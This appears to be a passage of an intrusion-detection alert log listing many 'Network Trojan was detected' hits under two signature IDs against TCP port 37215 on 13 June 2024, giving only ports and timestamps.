              SID:2835222
              Source Port:41466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010834
              SID:2835222
              Source Port:50062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613159
              SID:2835222
              Source Port:37012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059449
              SID:2835222
              Source Port:41904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610506
              SID:2829579
              Source Port:36554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787514
              SID:2829579
              Source Port:36512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671582
              SID:2829579
              Source Port:45718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107870
              SID:2829579
              Source Port:36024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155910
              SID:2835222
              Source Port:56130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197444
              SID:2829579
              Source Port:38906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440060
              SID:2829579
              Source Port:43198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781574
              SID:2829579
              Source Port:60676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245532
              SID:2829579
              Source Port:49866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158705
              SID:2835222
              Source Port:43988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509768
              SID:2835222
              Source Port:44676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656299
              SID:2829579
              Source Port:55898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725088
              SID:2835222
              Source Port:43982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507706
              SID:2829579
              Source Port:59984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477433
              SID:2835222
              Source Port:44464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306517
              SID:2835222
              Source Port:39094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.944034
              SID:2835222
              Source Port:38868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095346
              SID:2829579
              Source Port:59942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127030
              SID:2829579
              Source Port:34788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695102
              SID:2835222
              Source Port:57780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087285
              SID:2829579
              Source Port:32800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349135
              SID:2835222
              Source Port:54468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377016
              SID:2835222
              Source Port:34686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027794
              SID:2829579
              Source Port:37140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750702
              SID:2835222
              Source Port:43430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752985
              SID:2829579
              Source Port:50772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.251639
              SID:2835222
              Source Port:47434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092105
              SID:2835222
              Source Port:47878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910246
              SID:2835222
              Source Port:34692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991688
              SID:2835222
              Source Port:37566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674323
              SID:2835222
              Source Port:54030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377559
              SID:2829579
              Source Port:36182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870655
              SID:2829579
              Source Port:49552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611067
              SID:2835222
              Source Port:48978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.178082
              SID:2829579
              Source Port:52448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611309
              SID:2835222
              Source Port:56180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154715
              SID:2835222
              Source Port:59022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970136
              SID:2829579
              Source Port:54198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419930
              SID:2835222
              Source Port:36352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.280029
              SID:2829579
              Source Port:49734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300884
              SID:2829579
              Source Port:59256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728149
              SID:2835222
              Source Port:58242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803067
              SID:2829579
              Source Port:43770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802486
              SID:2829579
              Source Port:36672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418205
              SID:2829579
              Source Port:50572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839153
              SID:2829579
              Source Port:49254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344859
              SID:2829579
              Source Port:40966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272355
              SID:2835222
              Source Port:38618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527581
              SID:2835222
              Source Port:34660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039190
              SID:2835222
              Source Port:52796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224181
              SID:2835222
              Source Port:50254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355610
              SID:2835222
              Source Port:39592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197679
              SID:2829579
              Source Port:40710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509660
              SID:2829579
              Source Port:45434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678434
              SID:2835222
              Source Port:37340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680720
              SID:2829579
              Source Port:55362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177545
              SID:2835222
              Source Port:48496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090635
              SID:2835222
              Source Port:51766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175131
              SID:2829579
              Source Port:34484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437168
              SID:2835222
              Source Port:47234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231918
              SID:2829579
              Source Port:37780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823079
              SID:2835222
              Source Port:33684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528499
              SID:2829579
              Source Port:51130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372209
              SID:2835222
              Source Port:45278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231315
              SID:2835222
              Source Port:50460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677861
              SID:2835222
              Source Port:59850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041192
              SID:2835222
              Source Port:45836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749182
              SID:2835222
              Source Port:55680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129386
              SID:2835222
              Source Port:39204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418165
              SID:2835222
              Source Port:54634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487858
              SID:2829579
              Source Port:54976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078360
              SID:2829579
              Source Port:53954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097565
              SID:2835222
              Source Port:34768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356984
              SID:2829579
              Source Port:36090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252016
              SID:2835222
              Source Port:56884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.380261
              SID:2835222
              Source Port:35514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555470
              SID:2835222
              Source Port:55010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011456
              SID:2835222
              Source Port:48486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048615
              SID:2829579
              Source Port:43062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153558
              SID:2829579
              Source Port:40978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370509
              SID:2829579
              Source Port:41046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230828
              SID:2829579
              Source Port:48194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886927
              SID:2829579
              Source Port:46232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786221
              SID:2835222
              Source Port:47492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128898
              SID:2829579
              Source Port:50400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.479836
              SID:2835222
              Source Port:33978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220853
              SID:2835222
              Source Port:37672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697566
              SID:2835222
              Source Port:33962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457702
              SID:2829579
              Source Port:54894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.935562
              SID:2835222
              Source Port:49852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460112
              SID:2835222
              Source Port:60102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871608
              SID:2835222
              Source Port:46108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889623
              SID:2829579
              Source Port:47546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568940
              SID:2829579
              Source Port:43560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044590
              SID:2835222
              Source Port:45350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271879
              SID:2835222
              Source Port:42164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157536
              SID:2829579
              Source Port:49832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011176
              SID:2829579
              Source Port:48202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454156
              SID:2835222
              Source Port:38070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198718
              SID:2829579
              Source Port:32938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091682
              SID:2835222
              Source Port:48344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437227
              SID:2829579
              Source Port:59702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871335
              SID:2835222
              Source Port:43946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350284
              SID:2829579
              Source Port:37328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635010
              SID:2829579
              Source Port:46448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454790
              SID:2835222
              Source Port:39006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.338120
              SID:2835222
              Source Port:56284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404201
              SID:2835222
              Source Port:48520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154636
              SID:2829579
              Source Port:40178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506083
              SID:2829579
              Source Port:44164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438369
              SID:2829579
              Source Port:53056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303991
              SID:2829579
              Source Port:54022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400944
              SID:2829579
              Source Port:55036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175314
              SID:2829579
              Source Port:40034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486244
              SID:2829579
              Source Port:36716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266433
              SID:2829579
              Source Port:44060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091744
              SID:2829579
              Source Port:39744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572970
              SID:2835222
              Source Port:56506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821146
              SID:2835222
              Source Port:49174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823394
              SID:2829579
              Source Port:41230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310330
              SID:2829579
              Source Port:39300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376951
              SID:2835222
              Source Port:41482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078725
              SID:2829579
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418239
              SID:2829579
              Source Port:59144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093422
              SID:2835222
              Source Port:37588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785369
              SID:2835222
              Source Port:44196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989369
              SID:2829579
              Source Port:48896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346374
              SID:2829579
              Source Port:52072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506616
              SID:2829579
              Source Port:36500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174684
              SID:2835222
              Source Port:56846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376157
              SID:2835222
              Source Port:59368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220444
              SID:2829579
              Source Port:44254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308710
              SID:2829579
              Source Port:58534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756523
              SID:2829579
              Source Port:36162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255554
              SID:2829579
              Source Port:51284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422589
              SID:2835222
              Source Port:48218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752274
              SID:2835222
              Source Port:49044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267470
              SID:2829579
              Source Port:39308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263073
              SID:2835222
              Source Port:50140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306730
              SID:2829579
              Source Port:39972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044785
              SID:2835222
              Source Port:52950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709940
              SID:2829579
              Source Port:44134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.866574
              SID:2835222
              Source Port:34762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726651
              SID:2829579
              Source Port:54750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079073
              SID:2829579
              Source Port:52410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306220
              SID:2829579
              Source Port:53484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437527
              SID:2835222
              Source Port:48036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077388
              SID:2829579
              Source Port:41168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402184
              SID:2835222
              Source Port:46390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369998
              SID:2835222
              Source Port:53050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375312
              SID:2835222
              Source Port:50772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456603
              SID:2835222
              Source Port:39924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213554
              SID:2835222
              Source Port:34598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078101
              SID:2835222
              Source Port:50934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167595
              SID:2829579
              Source Port:35344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884860
              SID:2829579
              Source Port:48250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782258
              SID:2829579
              Source Port:39468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551530
              SID:2829579
              Source Port:53798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376403
              SID:2835222
              Source Port:51150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708780
              SID:2829579
              Source Port:42570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952189
              SID:2835222
              Source Port:50526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610904
              SID:2829579
              Source Port:42976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169931
              SID:2835222
              Source Port:43796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128867
              SID:2829579
              Source Port:43382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089657
              SID:2829579
              Source Port:34924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843923
              SID:2835222
              Source Port:35122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415442
              SID:2829579
              Source Port:46916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952296
              SID:2829579
              Source Port:57392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195740
              SID:2829579
              Source Port:36180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834722
              SID:2829579
              Source Port:50986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972454
              SID:2835222
              Source Port:34618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572079
              SID:2835222
              Source Port:57970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094100
              SID:2835222
              Source Port:56730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973047
              SID:2835222
              Source Port:44886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992741
              SID:2835222
              Source Port:48200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403278
              SID:2835222
              Source Port:59658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756597
              SID:2835222
              Source Port:58634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130037
              SID:2835222
              Source Port:48486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638319
              SID:2829579
              Source Port:34674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350192
              SID:2835222
              Source Port:49470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727701
              SID:2829579
              Source Port:40288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.725585
              SID:2835222
              Source Port:52604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174290
              SID:2829579
              Source Port:36446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488658
              SID:2835222
              Source Port:34168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525798
              SID:2835222
              Source Port:48374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731657
              SID:2835222
              Source Port:42534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474618
              SID:2829579
              Source Port:39396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418022
              SID:2829579
              Source Port:48256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131126
              SID:2835222
              Source Port:42664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991397
              SID:2835222
              Source Port:50686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456538
              SID:2835222
              Source Port:36038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725067
              SID:2829579
              Source Port:37068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106266
              SID:2835222
              Source Port:46818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509727
              SID:2829579
              Source Port:50794
              Destination Port:37215
